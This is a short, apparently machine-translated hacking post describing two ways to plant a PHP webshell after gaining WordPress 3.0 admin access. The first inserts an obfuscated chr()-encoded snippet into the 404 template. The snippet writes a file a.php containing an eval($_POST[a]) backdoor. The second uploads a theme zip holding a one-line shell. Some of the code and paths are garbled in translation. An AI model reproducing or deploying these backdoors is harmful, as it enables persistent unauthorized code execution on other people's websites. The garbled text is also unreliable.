The WordPress3.0 background 404 page can be customized
"Appearance"-"Edit"-"404 Template
<Script language = "php"> fputs (fopen (chr (46 ). chr (47 ). chr (97 ). chr (46 ). chr (1, 112 ). chr (1, 104 ). chr (112), w), chr (60 ). chr (63 ). chr (1, 101 ). chr (1, 118 ). chr (97 ). chr (1, 108 ). chr (40 ). chr (36 ). chr (95 ). chr (80 ). chr (79 ). chr (83 ). chr (84 ). chr (91 ). chr (97 ). chr (93 ). chr (41 ). chr (59 ). chr (63 ). chr (62); </script>
Insert To File Header
Point 404 template when there is a relative path in the address bar, the default is wp-contenthemeswentyten404.php
A backdoor a. php Password a will be generated in the twentyten directory after direct access to the localhostwp-contenthemeswentyten404.php is updated
A method provided by cnbird
============================
Great doll method:
It's not 0-day, but I used WP for a week to try as a blog. We found that WP can directly use SHELL if it can enter the background.
Daniel said that the insertion of 404 files, so why? It is not good to move other files. It is a tragedy if the insertion fails.
The local machine creates the directory "wawa" and puts 1. php in one sentence. Package the wawa directory as a zip file. Manage themes in the WP background, upload and install themes. Then your backdoor path is:
Wp-contenthemeswawa1.php
I am not a technical expert.